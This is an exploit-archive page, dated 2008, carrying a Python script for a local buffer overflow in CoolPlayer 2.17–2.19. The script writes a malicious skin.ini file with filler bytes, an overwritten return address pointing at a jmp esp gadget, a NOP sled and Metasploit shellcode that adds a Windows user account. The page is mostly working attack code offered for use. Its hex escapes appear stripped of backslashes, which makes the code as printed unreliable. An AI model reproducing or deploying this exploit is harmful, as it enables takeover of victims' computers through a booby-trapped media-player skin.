CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit (py)
# Published : 2008-12-22
# Author : Encrypt3d.M!nd
# Previous Title : Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH)
# Next Title : Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)

# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected  :) 
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################

chars = "A"*1511

eip = "x6Bx8Cx49x7E" #user32.dll jmp esp

header = "[CoolPlayer Skin]nPlaylistSkin="


# win32_adduser -  PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"
"x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx38x4ex57"
"x45x50x4ax47x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"
"x4fx45x42x52x41x30x4bx4ex49x54x4bx38x46x53x4bx38"
"x41x50x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx33x46x45x46x52x46x50x45x47x45x4ex4bx58"
"x4fx45x46x42x41x50x4bx4ex48x56x4bx48x4ex50x4bx34"
"x4bx58x4fx45x4ex51x41x30x4bx4ex4bx38x4ex41x4bx58"
"x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43"
"x42x4cx46x56x4bx58x42x54x42x43x45x38x42x4cx4ax37"
"x4ex30x4bx38x42x34x4ex50x4bx38x42x37x4ex41x4dx4a"
"x4bx58x4ax36x4ax50x4bx4ex49x30x4bx58x42x38x42x4b"
"x42x50x42x50x42x30x4bx48x4ax46x4ex33x4fx35x41x33"
"x48x4fx42x56x48x35x49x38x4ax4fx43x48x42x4cx4bx47"
"x42x35x4ax36x42x4fx4cx48x46x30x4fx55x4ax36x4ax49"
"x50x4fx4cx48x50x30x47x55x4fx4fx47x4ex43x46x4dx46"
"x46x36x50x42x45x36x4ax37x45x56x42x52x4fx42x43x56"
"x42x42x50x36x45x46x46x57x42x52x45x47x43x47x45x46"
"x44x37x42x32x46x47x43x43x45x43x46x57x42x52x46x47"
"x43x43x45x33x46x47x42x42x4fx32x41x34x46x54x46x54"
"x42x52x48x42x48x32x42x42x50x46x45x36x46x57x42x32"
"x4ex36x4fx56x43x46x41x36x4ex36x47x56x44x37x4fx36"
"x45x37x42x37x42x32x41x44x46x46x4dx56x49x56x50x56"
"x49x46x43x57x46x57x44x57x41x56x46x37x4fx46x44x37"
"x43x57x42x42x46x37x43x33x45x53x46x47x42x52x4fx52"
"x41x54x46x34x46x34x42x50x5a");

poc = (header+chars+eip+"x90"*10+shellcode)

file = open('skin.ini','w+')
file.write(poc)
file.close()

# www.Syue.com [2008-12-22]